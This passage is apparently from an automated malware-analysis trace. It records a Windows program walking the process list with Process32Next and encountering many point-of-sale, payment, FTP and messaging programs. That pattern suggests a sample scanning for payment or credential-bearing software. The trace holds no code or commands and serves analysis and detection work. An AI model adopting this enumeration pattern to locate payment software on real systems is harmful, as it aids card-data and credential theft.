th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x82, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.497] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.498] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.499] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.500] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.502] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.503] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.504] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.505] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.507] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.508] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.509] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.510] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.511] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.513] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.514] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.515] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.517] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.518] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.520] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0109.521] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.523] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0109.525] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.527] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.528] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0109.530] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0109.533] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0109.534] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0109.535] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.537] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0109.539] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.540] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0109.541] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.543] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.545] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0109.546] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.549] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.551] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0109.553] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0109.554] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0109.556] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0109.558] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0109.559] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0109.561] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0109.563] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0109.565] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0109.567] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0109.569] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0109.570] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0109.572] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0109.574] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0109.576] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0109.590] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0109.592] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0109.593] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0109.595] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0109.596] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0109.597] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0109.599] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0109.600] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0109.602] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0109.604] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0109.606] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0109.607] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0109.608] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0109.610] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0109.612] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0109.614] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0109.615] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0109.617] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0109.619] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0109.621] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0109.622] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0109.623] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0109.627] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0109.628] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0109.630] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0109.631] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0109.633] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0109.634] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0109.635] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0109.637] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0109.638] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0109.640] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, 